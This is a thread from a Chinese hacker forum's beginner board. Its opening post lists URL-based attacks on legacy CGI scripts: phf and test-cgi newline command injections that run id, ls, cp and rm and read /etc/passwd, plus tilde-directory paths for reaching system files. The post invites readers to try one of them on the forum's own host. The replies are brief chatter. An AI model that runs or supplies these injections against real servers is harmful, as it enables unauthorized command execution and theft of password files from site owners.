20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 安 全 基 地   » 菜鸟乐园   » 浏览器攻击

   
作者 标题: 浏览器攻击
笑看风云130
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  

在本章我将讲述一些利用浏览器来进行攻击的方法 1。大家都知道了phf攻击了,phf是cgi script,很多站点都有这个大漏洞啦,使用 http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以拿到那个站点的passwd.但还有些更好的执行方法呦如: http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna me=&Qoffice_phone= http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname= haqr&Qemail=&Qnickname=&Qoffice_phone= http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd %0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone= http://thegnome.com/~someuser/passwd http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname =haqr&Qemail=&Qnickname=&Qoffice_phone= 上面执行的命令是 id ls -la ~someuser cp /etc/passwd ~someuser/passwd rm ~someuser/passwd 2。有关test攻击 http://thegnome.com/cgi-bin/test-cgi?\whatever 服务器会应答,本服务器的一些情况如: CGI/1.0 test script report: argc is 0. Argv is . SERVER_SOFTWARE = NCSA/1.4B SERVER_NAME = thegnome.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/1.0 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /cgi-bin/test-cgi QUERY_STRING = whatever REMOTE_HOST = fifth.column.gov REMOTE_ADDR = 200.200.200.200 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = 好吧,让我们来点赶兴趣的 http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd 3。~的应用 ~主要是用在很多的个人主页上的快捷目录的方法,如果我们使用这样的~ http://thegnome.com/~root http://thegnome.com/~root/etc/passwd 不是在任何平台上都通过呦,在BSD Apache上曾经成功过,当然还可以试试~bin ,~etc,~uucp….. 看到这个站点了吗,本站所在的这个站点就是用这种形式的,如果我们打入 本站所在的web地址/~bin 出现了什么,你看到了吗?然后……………注意请不要破坏


<a href="http://www.dfminfo.com.cn/counter/listcounter.asp?user=xkfy130" target=stat><script language="JavaScript" src="http://www.dfminfo.com.cn/counter/counter.asp?user=xkfy130"></script></a>

IP: 已记录
baigaozh
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
是这样吗? http://www.20cn.net/~bin

我看到的怎么是:找不到该页呀!

IP: 已记录
woody
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
最上面的小奶,这帖子也太老了一点吧,我记得一年前好像就有了
IP: 已记录
woody
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
对不起,是小姐。五笔容易错,嘻嘻
IP: 已记录
我是锤垫子
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
你说的是uncoide漏洞吧!
IP: 已记录
笑看风云130
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
呵呵~~~~~~这是我收集到的。可不是我的原创哦:)
昨晚闲得没事干就放上来玩玩。


请原谅:)嘻嘻~~~~~~
IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
- 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。